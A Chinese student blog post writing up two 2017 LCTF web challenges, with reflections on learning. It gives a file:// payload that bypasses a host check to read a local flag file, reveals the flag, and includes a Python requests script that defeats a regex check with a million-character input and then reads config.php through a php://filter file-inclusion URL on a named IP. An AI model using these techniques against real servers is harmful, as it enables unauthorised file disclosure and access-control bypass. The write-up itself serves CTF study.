美文网首页
2018-01-15

2018-01-15

作者: 乱七八糟的心情 | 来源:发表于2018-01-15 11:39 被阅读0次

2017 LCTF 学习体会

1. web签到题:

用file协议可以读取本地文件

要绕过逻辑中对host的检查,需要用到curl命令,curl支持file://host/path, file://path 这两种形式,都会访问到本地文件

截断url后面拼接的/, GET请求,用?#都可以

Payload:

  file://www.baidu.com/etc/flag?

LCTF{1eTus_q14ndao_B4_387t439hg9342}

之前自己做的时候想到本地代理一般都是设置为127.0.0.1:8080, 试过之后发现不行,查询之后发现它只是本机的一个回送地址,不进行网络传输

2. 萌萌哒的报名系统:

这题提示给了IDE,从大佬的wp中知道PHP有款强大的IDE叫做PHPSTORM,它新建项目时会产生一个.idea文件夹,payload: http://123.206.120.239/.idea/ 访问文件夹

发现有一个xdcms2333.zip, payload: http://123.206.120.239/xdcms2333.zip? 下载这个压缩包,打开得到整站源码:

查看了login.php和member.php 没有发现什么有用的东西,看register.php 时, 有以下两处关键代码:

$admin = "xdsec"."###".str_shuffle('you_are_the_member_of_xdsec_here_is_your_flag');

preg_match('/^(xdsec)((?:###|\w)+)$/i', $code, $matches);

如果匹配了$matches[0]=$admin,就可以把xdsec注册到identities表中去,这样我们就可以绕过member.php中的:

$sth->execute([':username' => $_SESSION['username']]);

    if ($sth->fetch()[0] === 'GUEST') {

        $_SESSION['is_guest'] = true;

}

  但是str_shuffle是不可预测的。所以要另找方法,很多人用的非预期解—条件竞争,如果在identities表中没有username这一行数据,那么取出来$sth->fetch[0]的结果就为null,可绕过第一层,所以可以用Python多线程注册用户,(没试过)。

其实正解是通过pre_match函数的资源消耗来绕过,喂给pre_match一个很长的字符串,会导致pre_match消耗大量资源从而导致后面的php不会执行。

脚本如下:

# !/usr/bin/env python

# -*- coding: utf-8 -*-

import requests

import threading

import re

import os

__author__ = "hahahha"

s = requests.session()

url = 'http://123.206.120.239/'

url1 = url+'register.php'

url2 = url+'login.php'

url3 = url+'member.php?file=php://filter/resource=config.php'

headers = {'User-Agent':'Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0'}

def register():

    data = {

        'username':'Asdfgh',

        'password':'123456',

        'code':'xdsec###'+'A'*1000000

        }

    try:

        res1=s.post(url1,headers=headers,data=data,timeout=10)

        print (res1.text)

    except:

        pass

def login():

    data = {

        'username':'Asdfgh',

        'password':'123456'

        }

    res2=s.post(url2,headers=headers,data=data)

    print (res2.text)

def member():

    res3 = s.get(url3,headers=headers)

    print (res3.text)

if __name__=='__main__':

    register()

    login()

    member()

脚本是看别人的,在这里也总结一下,一般的应该怎么写:

Requests是Python的第三方库,需要自己下载安装才能使用,这次用到的是web提交的基本使用,requsets.session()是一个会话,requests.session().post(url,headers,data,timeout), 其中headers只把User-Agent 添加进去就行了,不过要添加完整,我做的时候就复制少了,所以一直出不来,print(res.txet)打印的内容要规范一点,最好别用(res.content)。

经过这道题,我觉得我要学的东西还很多,PHP代码审计,正则表达式是很重要的,等Python的老师讲有点等不及了,先自己看看吧,再实践实践,Python也用得不是很熟。加油吧,少年!

注:自己实在是太菜,复现都只能做出两道题来,唉唉唉!最近刚半期考完,数电成绩很不理想,英语六级也快要考了,花在这方面的时间可能会要少一点。

相关文章

  • 2018-01-15

    小裸熊想妈妈。 2018-01-15 14:45

  • alpine 镜像时区问题

    2018-01-15 更新 解决 : Java FontConfiguration Exception(安装 tt...

  • 棠下小学教师正面管教专项培训(2)班心得分享

    ————— 2018-01-15 ————— anna_lu 17:39 今天赵老师的正面管教学习氛围让我很愉快,...

  • 练习:学会表达自己的情绪

    NO.23 练习:学会表达自己的情绪 7178 5 2018-01-15 17:00 练习主题:情绪力 练习要点:...

  • 2018-01-15

    有朋友是幸福, 有知己是难得! 2018-01-15 做人做事 时光,留不住昨天; 缘分,停不在初见。 感情,需要...

  • 123|打打闹闹好处多

    松球42 字数 124 · 阅读 3 2018-01-15 16:37 孩子在打闹中,能够锻炼运动能力,情绪信号的...

  • 2018-01-15周一 祷告词

    2018-01-15为国家祷告:认识真神!(徒14:17) 【经文】【徒 14:17】 然而为自己未尝不显出证据来...

  • 流年

    清晰的风雨肆虐无边 岁月流年 拥有黄叶空中飘 流年似曾 你在左 我在右 2018-01-15

  • 亲子践行日记5~豆豆

    [2018-01-15] 今天是:周一,日出:晴 起床:6:00(学习成长只有开始,今天没做,不是明天不做的理由)...

  • 135|如何培养乐观的孩子?

    135|如何培养乐观的孩子? Dr. 魏 2018-01-15 135|如何培养乐观的孩子? Dr.魏亲述 Dr....

网友评论

      本文标题:2018-01-15

      本文链接:https://www.haomeiwen.com/subject/momroxtx.html